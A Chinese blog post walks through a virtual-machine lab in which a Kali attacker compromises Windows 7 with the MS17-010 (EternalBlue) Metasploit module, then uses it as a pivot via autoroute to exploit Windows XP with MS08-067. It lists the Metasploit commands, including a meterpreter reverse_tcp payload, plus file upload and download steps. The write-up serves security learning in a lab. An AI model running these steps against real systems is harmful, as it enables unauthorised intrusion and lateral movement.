跨网段攻击

最新推荐文章于 2024-06-04 18:38:16 发布
最新推荐文章于 2024-06-04 18:38:16 发布
阅读量1k 收藏 7
点赞数 3
文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moli_a/article/details/130509761
版权

文章目录

1、实验内容

      模拟使用kali作为攻击机通过外网渗透win7,并把win7作为跳板,攻击内网中的winxp

2、实验准备

靶机:win7(双网卡):192.168.44.164(NAT)+10.10.10.129(仅主机模式)
           winxpsp3:10.10.10.128(仅主机模式)
攻击机:kali:192.168.44.165(NAT)

实验开始前,需要配置所需的环境:
     1.这里kali使用NAT模式,作为外网的攻击机,通过ifconfig获取IP地址。

     2. 配置内网:在VM虚拟机中新建一个虚拟网段Vmnet2,并设置为仅主机模式:
在这里插入图片描述
win7虚拟机作为kali的攻击跳板,需要设置两个虚拟网卡,其中一个设置为刚刚设置为仅主机模式:
在这里插入图片描述
然后将目标机winxp也设置在同一网段:
在这里插入图片描述
这里实验所需要的环境就算配置完成了。

3、渗透攻击环节

这个实验的重点是跨网段攻击,所以就前面的渗透攻击win7不做过多的演示:

3.1kali通过永恒之蓝ms17-010攻击win7

● search ms17-010 //通过nmap扫描到445端口,搜索ms17-010这个漏洞相关的脚本
● use 0 //使用攻击脚本 //kali系统里面在/usr/share/metasploit-framework/modules/目录下能看具体载荷的代码,后边根据具体脚本而定
● set rhost ip地址 // 设置目标的IP地址、我们需要攻击的地址
● set lhost ip地址 //kali的IP地址
● set payload windows/x64/meterpreter/reverse_tcp // 设置基于TCP反向连接的攻击载荷
● run //执行攻击

在这里插入图片描述

可以看到我们已经攻击成功了。这里可以使用一些命令:

1、screenshot(获取屏幕快照)
2、上传文件到Windows主机:upload /root/csb666.jpg c://csb666.jpg
3、从Windows主机中下载文件到kali中:download d:/meishaonv.jpg /root

3.2 shell模块进行远程登录

首先我们可以查看它的IP:
在这里插入图片描述
如果查看的结果是乱码,输入chcp 65001就可以显示正常。我们可以发现,win7这台机器有两个网卡,发现还有一个10.10.10.x的网段,那我们可以查看是否存在其他ip:
在这里插入图片描述

arp -a参数的含义就是通过询问当前协议数据,显示当前 ARP 项。如果指定 inet_addr,则只显示指定计算机的 IP 地址和物理地址。如果不止一个网络接口使用 ARP,则显示每个 ARP 表的项。可以在命令窗口输入arp /?查看具体说明。

我们可以看到在内网中还有一个ip,这个就是要攻击的winxp,通过win7给攻击机kali分配一个网段(将内网段添加到路由):
在这里插入图片描述

查看路由映射情况:run autoroute -p
在这里插入图片描述
这个时候已经实现了给kali分配一个ip,使得kali可以和winxp进行连接。然后就可以对winxp进行渗透攻击。

4、跨网段攻击 kali——>winxp

使用ms08-067对winxp进行攻击,同kali攻击win7一样:
在这里插入图片描述
这里需要注意的是payload只能正向连接,因为winxp是ping不同kali,而kali能ping同winxp。整个跨网段攻击就是这样,这里面通过kali对win7和winxp都挺容易,只需要用已发现的漏洞进行渗透测试,主要是将内网段添加至路由表对于小白来说很陌生。这个实验主要分享学习心得,体会攻击的过程所以不会涉及太多NB的操作。
在这里插入图片描述

hurr1canE_W
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
网段的ARP欺骗攻击是不可能的(20211109180521).pdf
11-09
然而,标题所指的“网段的ARP欺骗攻击是不可能的”这一观点源于对ARP协议和网络分段原理的理解。 首先,ARP协议主要用于将IP地址映射为物理MAC地址,以实现局域网(LAN)内的通信。当主机A想要与同一网段的主机B...
Windows网络服务渗透测试实战-网段攻击
c_lanxiaofang的博客
05-19 6326
一、实验项目名称 Windows网络服务渗透测试实战-网段攻击 二、实验目的及要求 掌握对网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
课设之网段攻击
qq_51558360的博客
06-26 1691
网段攻击
Kali初讲——非局域网下入侵手机
最新发布
萌蠢骇客
06-04 1939
kali linux使用反弹shell入侵手机全流程——使用本教程请遵循网络安全法。
ONE DAY |网络安全渗透测试之网段攻击
EverUP
05-04 1989
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5899
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XPWindows Server 2003 系统上,攻击者可能未经身份验证即可利
网段攻击+MS08-067漏洞复现
moreEFFORTmoreNB的博客
05-11 288
网段攻击+MS08-067漏洞复现
网段攻击模拟实验
weixin_65336001的博客
05-05 649
网络安全小白初学者——网段攻击
网段ARP欺骗的原理及防治策略的研究
10-24
ARP协议主要实现了网络层地址到数据链路层地址的动态映射,由于ARP协议具有无序性、无...在深入研究ICMP重新定向原理的基础上,通过一个实例解释了网段ARP欺骗原理和具体实现过程,并给出了具体的检测与防范方法。
网段网络组建与静态路由配置
11-21
- 从PC0发送ping命令到PC2和PC3,验证网段通信是否成功。 - 使用traceroute命令追踪包的传输路径,确认路由配置正确。 #### 结论 通过本实验的学习,学生不仅掌握了多网段网络的基本构建方法,还学会了如何配置...
网络转发器 .rar_应用层_网段_网络转发器_转发_转发 socket
07-15
网络转发器:应用层与网段通信的桥梁》 网络转发器是一种软件工具,其核心功能在于在不同网段之间实现应用层的数据传输,它充当着网络通信中的一个智能桥梁,允许信息在不同网络环境中顺畅流动。本文将深入探讨...
C/S结构的网段ARP异常通知
11-06
标题 "C/S结构的网段ARP异常通知" 涉及到的是...开发者通过C/S架构实现了设备的信息传递,确保了在网络异常发生时能够迅速采取应对措施。对于熟悉网络协议和C/S架构的IT专业人士来说,这是一个很好的学习和实践案例。
好文转载 ONE DAY |网络安全渗透测试之网段攻击
AI_data_cloud的博客
05-05 606
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)
热门推荐
Firebasky的博客
04-30 1万+
1.什么是DOS/DDOS攻击? DOS:拒绝服务攻击(Deny Of Service) DDOS:DDOS攻击(Distributed denial of service attack) 一般来说DDOS攻击更难防御 自认为的区别:DOS是相当于一个进行攻击 而DDOS就是黑客控制了many肉鸡就是攻击 注:只是简单的了解,可以百度深入了解他们之间的区别 2.进入正题 kali攻击 a.tcp攻...
kali 攻击 Win XP
感谢关注
12-17 513
1.启动kali,切换到。(2)检查是否连上,显示。6.设置目标,根据自己。
入坑之路第三天(kali服务器端攻击工具下)
weixin_38161055的博客
03-20 759
利用电子邮件系统的漏洞(Fierce、Netcat) MX主机就是SMTP服务器 暴力破解攻击 Hydra(暴力破解攻击方法来测试一系列不同的协议,搭配Firefox插件Tamper Data) DirBuster(暴力破解web应用服务器上的目录和文件名而设计的) John the Ripper(密码破解器) WebSlayer是一个Web应用程序破解工具 中间人攻击 SSL s...
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3421
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
kali-ARP欺骗
忘忧的博客
07-25 3962
一、实战环境(试验设备) windos7 kali linux (arpspoof工具和driftnet工具) 二、试验原理和试验内容 1、试验原理 1. APR协议:ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议中的网络层,负责 将IP地址解析为MAC地址的协议,可以分为两种(动态和静态两种类型) 2、ARP协议功能:查询目标IP地址的MAC地址,以保证通信正常 3、ARP欺骗的缺点:只能在局域网中进行,无法对外网攻击 4、APR攻击原理:通过
vlan trunk stp攻防
ChenD的学习笔记
11-17 1376
一、VLAN、Trunk面临的安全风险 trunk干道攻击DTP攻击(思科特有) VLAN跳跃攻击 STP根桥攻击 二、攻击防护
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值